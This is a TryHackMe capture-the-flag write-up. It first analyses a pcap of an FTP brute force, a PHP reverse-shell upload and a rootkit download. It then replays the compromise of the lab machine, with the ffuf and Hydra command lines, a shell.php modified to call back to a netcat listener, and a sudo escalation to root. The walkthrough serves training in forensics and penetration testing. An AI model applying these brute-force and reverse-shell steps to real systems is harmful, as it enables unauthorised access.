h4cked — TryHackMe
Find out what happened by analyzing a .pcap file and hack your way back into the machine.This is a beginner's friendly room and can be found here:
The attacker is trying to log into a specific service. What service is this?
Open WireShark and notice that service which the attacker is trying to login in to is FTP.Now do the following to the the username and password asked in later questions.Select the first FTP packet->right click, Follow->TCP Stream.
There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
The attacker is trying to log on with a specific username. What is the username?
What is the user’s password?
What is the current FTP working directory after the attacker logged in?
Clear the filter which was applied earlier and got to packet number 401 which is just after the successful FTP login.This packet will show the current FTP working directory.
The attacker uploaded a backdoor. What is the backdoor’s filename?
Check packet no. 425 in Capture.pcapng
The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
A famous php shell from pentest monkey. Check packet no. 431.
Which command did the attacker manually execute after getting a reverse shell?
Select packet no. 452 and right click->Follow->TCPStream. This will reveal what the attacker was doing on the target after getting the shell.
This will also tell us the computer’s hostname,command the attacker executed to spawn a new TTY shell, command executed to gain a root shell and what attacker downloaded from GitHub.
The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
Browse to the GitHub project found the last question and the about section will gives us the type of the backdoor that was used.
Hack your way back into the machine
Run a quick NMAP scan to check what services are running on the target:
└─$ nmap -sC -sV 10.10.43.233
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
So 2 services are running.Now the attacker has changed the user’s password! We need to replicate the attacker’s steps and read the flag.txt. The flag is located in the /root/Reptile directory.
First Brute force directories and files on port 80 using ffuf:
└─$ ffuf -u http://10.10.43.233/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c /'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.2.1
________________________________________________:: Method : GET
:: URL : http://10.10.43.233/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
shell.php [Status: 200, Size: 143, Words: 20, Lines: 3]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 1854 req/sec :: Duration: [0:09:13] :: Errors: 0 ::
We can see shell.php. This help us to do RCE on the server. Now use Hydra to brute force the FTP login password for user “jenny”:
hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.43.233
Hydra found it very quickly in rockyou.txt. Login on the target via ftp using the credentials we now know:
As shell.php got read,write and execute permissions for everyone, “get”
shell.php on to the local machine and edit it with the IP Address of the local machine and port of your choice so that we get a reverse shell back.”Put” the file back. Execute shell.php via the browser, after starting a netcat listener on our local machine :
We got our reverse shell:
Run the following to upgrade the current shell:
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Switch use to jenny using the same password which we found using hydra:
Check what jenny can run as other user using,again use the same password:
User jenny as run any command as root, so just use
sudo su to get root:
Find the root flag at
That’s it. Thanks for reading.